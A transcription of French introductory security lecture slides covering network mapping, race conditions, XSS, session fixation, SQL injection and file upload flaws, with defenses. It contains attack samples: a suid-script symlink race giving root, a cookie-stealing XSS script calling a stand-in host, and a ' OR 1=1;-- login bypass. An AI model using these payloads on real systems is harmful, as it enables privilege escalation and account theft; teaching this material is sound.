Frédéric Gava (MCF) gava@u
Transcription
Frédéric Gava (MCF) gava@u
Introduction à la sécurité Informatique Frédéric Gava (MCF) [email protected] LACL, bâtiment P2 du CMC Université de Paris-Est Créteil 61 avenue du Général de Gaulle 94010 Créteil cedex Checkmates Les exemples sont tirés de cas réels rencontrés par la société Checkmates http://www.checkmates.eu/fr/ http://www.checkmates.eu/_medias/files/CheckMates%20%20TOP%2010%20Corporate%20Networks%20Security% 20Flaws%20-%20January%202010%20-%20v1.0.pdf 2/35 Cartographie 3/35 Objectifs et outils Objectifs: avoir le plus d’information possible quant à l’architecture cible. Exemples d’outils: Google : informations diverses Nmap : scanner de ports. Permet de savoir quels services sont ouverts sur une machine. CheckPhone : permet de faire du wardialing, c’està-dire essayer tous les numéros de téléphone d’un segment pour localiser des équipement informatiques. Traceroute : permet de connaître l’itinéraire d’un paquet entre nous et la cible. Tcptraceroute : idem que précédent, en TCP. Hping : permet de créer toutes sortes de paquets, afin d’affiner les résultats. Telnet : connexion directe à un port sur une machine, pour tests manuels. etc. 4/35 Exemples: : plusieurs connexion, si Tcptraceroute toujours même machine, c’est certainement un serveur ou un firewall ! Telnet, connexions manuelles, récolter les bannières des services et ainsi identifier les produits : Sur portail.toto.net 80 GET / HTTP/1.0 HTTP/1.1 200 OK Date: Tue, 25 Apr 2009 09:30:29 GMT Server: Microsoft-IIS/5.0 Sur portail.toto.net 80 GET / / / HTTP/1.1 400 Bad Request Date: Tue, 25 Apr 2009 09:45:43 GMT Server: Apache/1.3.27 (Unix) Sur portail.toto.net 443 GET / HTTP/1.1 Host: portail.toto.net HTTP/1.1 400 Bad Request Date: Tue, 25 Apr 2009 09:44:34 GMT Server: Apache/1.3.29 (Unix) PHP/4.3.4 mod_ssl/2.8.16 OpenSSL/0.9.7c 5/35 Cartographie 6/35 Affinage Dans certains cas, il faut affiner les résultats Comment savoir ce qui se cache derrière une adresse IP ? ICMP Timestamp (permet d’obtenir l’heure système de la station distante) TCP Timestamp (permet d’obtenir l’uptime) IP ID (numéro de séquence du paquet) 7/35 Affinage (2) Exemple : ici, 2 serveurs DNS distincts sont identifiés : 8/35 Affinage (3) Pourtant, il s’agit de la même machine (ou du même cluster) : les IP ID le montrent 9/35 Affinage (4) Grâce à cette méthode, les adresses correspondant à la même machine peuvent donc être regroupées : 10/35 Conclusion L’étape de cartographie est très rarement (voire jamais) réalisée seule. Elle se place en introduction à des « pentests » systèmes au minimum. Avantages : Non intrusif Optimise les attaques ultérieures Permet de soupçonner l’existence de failles systèmes (versions, etc.) Le client peut estimer quelle visibilité il donne de son réseau à l’extérieur Inconvénients : Peu de certitudes : les schémas produits sont toujours des estimations de la réalité Pas de preuve concrète de l’existence de failles (sauf cas particulier, comme les DNS récursifs) 11/35 Quelques attaques 12/35 Race-condition (1) Soit 2 processus coopératifs de durée aléatoire ayant accès à une même ressource A : L’état final de A diffère en raison d’une absence de synchronisation 13/35 entre processus Exemples attaques (1) D’anciennes implémentations de la commande Unix « mkdir » étaient constituées des opérations suivantes : Le Super user crée le répertoire “dir” Les permissions par défaut sont 777. Le Super user exécute chown pour donner la propriété de « dir » à l’utilisateur de mkdir L’utilisateur change les permissions via umask(2) selon sa variable umask. L’attaque : Trouvez un répertoire où vous pouvez écrire (/tmp) Créez un script A qui : Tourne en permanence à la recherche de /tmp/Myfile Supprime dès qu’il trouve ce fichier et le remplace par un link vers /etc/password Créez un script B qui : Sleep(5) Mkdir /tmp/Myfile Lancez A avec une priorité haute et B avec une priorité faible Que se passe-t-il si le link arrive avant le chown ? Vous êtes temporairement le propriétaire de /etc/password 14/35 Exemples attaques (2) De nombreuses applications ont été vulnérables, même récemment En 2009 : SQL Server OpenSSH Firefox Java VMWare Etc. Ces failles peuvent permettre : D’exécuter des commandes arbitraires D’accéder illégitimement à des données Créer un déni de service Corrompre des données etc. 15/35 Exemples attaques (3) Lorsque plusieurs programmes s'exécutant en même temps partagent une ressource, typiquement le système de fichier. Attaque sur les scripts suid : $ id uid=1000(gava) gid=1000(gava) groups=4(adm) $ head -n 1 /bin/suidscript #!/bin/sh $ cd /tmp; echo "id" > titi.sh; ln -s /bin/suidscript toto $ (nice -n +19 ./toto &) ; ln -sf titi.sh toto uid=0(root) gid=0(root) groups=0(root) Pourquoi: le système suit le lien toto et trouve un programme suid devient root le système invoque l'interpréteur donné dans la première ligne avec le source en argument /bin/sh toto pendant que /bin/sh se charge, ln remplace toto (le nice -n +19 lui laisse du temps) /bin/sh lit le contenu de toto et donc de titi.sh et l'exécute id de root les systèmes modernes ignorent suid sur les scripts 16/35 Exemples attaques (4) Attention : évitez d'utiliser une suite d'appels à chown, chgrp et chmod qui prennent un nom de fichier en paramètre : le fichier peut changer entre deux appels. Utilisez plutôt fchown, fstat et fchmod qui prennent un descripteur de fichier (ne peut pas changer) un appel à "access" suivi de "open" est fautif car les droits peuvent changer entre les deux appels. A la place, positionner les droits avec umask, setuid et setgid et lancer directement open en testant la valeur de retour. tout fichier créé doit avoir les droits corrects dès le début utiliser umask suivi de open avec le mode O_CREAT|O_EXCL, puis vérifier l'absence d'erreur attention à la création de fichiers temporaires (délai entre la création du nom et celle du fichier): Solution utilisez mkstemp au lieu de tempfile utilisez umask au préalable une fois le fichier fermé, ne l'ouvrez plus jamais et ne réutilisez pas son nom effacez immédiatement le fichier avec unlink il disparaît du système de fichier mais reste utilisable jusqu'à sa fermeture (et le fichier sera effacé même si le programme plante) plutôt que d'utiliser /tmp, créez un sous-répertoire privé ( umask avant création) attention à NFS (v2) qui ne supporte pas O_EXCL. ne faîtes pas confiance aux variables d'environnement TMP et TMPDIR si l'utilisateur peut les positionner 17/35 Cross Script Scripting (XSS) Cette attaque s’effectue à l’encontre des utilisateurs de l’application, et non de l’application elle-même Elle permet en cas de succès de voler leur session (entre autres), et donc d’accéder à leurs données Possible à cause d’une erreur de développement : une page « affiche » ce qu’un utilisateur entre, sans filtrage préalable De plus, il s’agit d’une faille médiatique (Cf. l’affaire des banques contre « Kitetoa », bug tweeter etc.) 18/35 XSS (1) 2 cas de figure principaux : Intégration permanente (cas du forum) : la forme la plus destructrice mais assez rare. Intégration volatile : cas de figure fréquent mais nécessite que l’utilisateur accède au site vulnérable à travers un lien spécialement forgé Exemple : une page contient la possibilité d’injecter des données dans son contenu à travers un paramètre, sans filtrage : http://www.unsite.fr/bienvenue.php?prenom=<B>nimportequoi</B> Le site renvoie une page du type : « Bienvenue nimportequoi ! » Du code javascript peut alors être intégré dans une page à travers un lien. Dans ce qui suit, un simple « popup » : 19/35 XSS(2) 20/35 XSS (3) <script>document.location='http://MySite/dump.asp?cookies=„+document.cookie</script> 21/35 XSS (4) 22/35 XSS (5) 23/35 XSS (6) 24/35 XSS(7) Détection simple : insérer ce texte champ de formulaire ou dans une URL : <script type="text/javascript">alert('bonjour')</script> Elle n’attaque pas directement un serveur ou une application, mais ses utilisateurs Cette vulnérabilité est relativement simple à détecter : Retraiter systématiquement le code HTML produit par l'application avant l'envoi au navigateur ; Filtrer les variables affichées ou enregistrées avec des caractères '<' et '>' En PHP : utiliser la fonction htmlspecialchars() qui filtre les '<' et '>' (cf. ci-dessus) ; utiliser la fonction htmlentities() qui est identique à htmlspecialchars() sauf qu'elle filtre tous les caractères équivalents au codage HTML ou Javascript. utiliser strip_tags() qui supprime les balises. Utiliser de façon propre les balises HTML <noscript></noscript> (failles connus, voir http://securethoughts.com/2009/02/hacking-for-xss-inside-noscripthtml-tags/) 25/35 Cross-site cooking (1) Exploit des navigateurs Web et repose sur une mauvaise interaction entre deux sites Web. Cet exploit permet notamment l'usurpation d'identité au moyen d'attaque par fixation de session. Exemple : Alice utilise régulièrement le site A sur lequel elle s'identifie de manière sécurisée (site bancaire par exemple) Oscar incite Alice à visiter le site B, qui envoie au navigateur un cookie d'identifiant de session au nom du site A. Oscar incite Alice à visiter le site A. Lorsque Alice se connecte sur le site A avec l'identifiant de session que lui a communiqué le Site B, Oscar a alors accès au compte d'Alice grâce à l'identifiant de session. Ce type d'attaque peut être couplé à du phishing. Par exemple, le site B pourrait être fortement semblable au site A et rediriger Alice vers le site A après lui avoir communiqué l'identifiant de session. 26/35 Cross-site cooking (2) Prévention : Associer à l'identifiant de session l'adresse IP. Cela empêcherait Oscar de se connecter au compte d'Alice à moins qu'il n'ait la même adresse IP. Expirer les anciens SIDs Générer une nouvelle session à chaque connexion. Oscar n'aurait alors plus le bon identifiant de session. Permettre à Alice de se déconnecter du site, et détruire alors le cookie d'identifiant de session. 27/35 Injection SQL (1) Cette fois, cette vulnérabilité concerne l’application ellemême, et le serveur qui l’héberge Due à un mauvais filtrage des paramètres envoyés par le client à l’application Le pirate injecte des commandes pour « piloter » la base de données utilisée par l’application Risques critiques pour l’application, voire pour le système. Possibilité : D’obtenir toutes les données de la base notamment les informations des clients De corrompre les données de la base de donnée De « defacer » le site Web De compromettre totalement le serveur (prise de main à distance) De rebondir sur d’autres serveurs 28/35 Achat sans payer (sites marchand) etc. Injection SQL (2) Exemple : Ensuite, envoyer des requêtes plus complexes … 29/35 Injection SQL (3) 30/35 Injection SQL (4) Un formulaire HTML contient <form method="post" action="process_login.php"> <input type="text" name="username"> <input type="password" name="password"></form> Exemple de requête exécutée par le serveur : SELECT * FROM Users WHERE username = ' "& username &" ' AND password = ' "& password &" ' ; Si un utilisateur fournit jsmith comme Username et MyPass comme mot de passe, la requête suivante est envoyée au SGBD : SELECT * FROM Users WHERE username = ‘Jsmith' AND password =‘MyPass' ; 31/35 Injection SQL (5) Réalisation de l’attaque : L’attaquant fournit le mot de passe suivant : ' OR 1=1;-- Dans ce cas, la requête suivante est envoyée à la base : SELECT * FROM Users WHERE username = ‘jsmith' AND password = ' ' OR 1=1;-- ' ; Dans ce cas, le SGBD retourne le n-uplet du user Jsmith (ou toutes les lignes) Si on ne connaît pas d’utilisateur, on peut utiliser le même champ pour le login connecté en tant que premier utilisateur de la base En général, il s’agira de l’administrateur de la base 32/35 Injection SQL (6) Protection : Filtrage des entrées utilisateur Utiliser une liste blanche (n’autoriser que le réputé valide) Type (entier, caractères, etc.) Range Lettres Chiffres Et rejeter TOUT le reste Si difficile à mettre en œuvre, utiliser une liste noire (interdire ce qui est connu comme dangereux) Les caractères spéciaux. ex : # " ' ; Les mots clefs. ex : SELECT, UNION, DELETE, exec, master..xp_cmdshell Il peut être utile de filtrer les sorties Ex : messages d’erreurs trop explicites… Erreur de connexions … mieux vaut ne rien afficher ! 33/35 Upload de fichier (1) Certains sites web proposent l’upload de fichiers (souvent images) Les pirates vont chercher à envoyer autre chose que les fichiers prévus par les développeurs (virus, cheval de Troie, pages web) Exemple : ici on peut attacher une image pour illustrer son compte; les utilisateurs mettent une photo d’identité, mais le pirate…envoie un fichier « .aspx » (format Microsoft .NET) 34/35 Upload (2) 35/35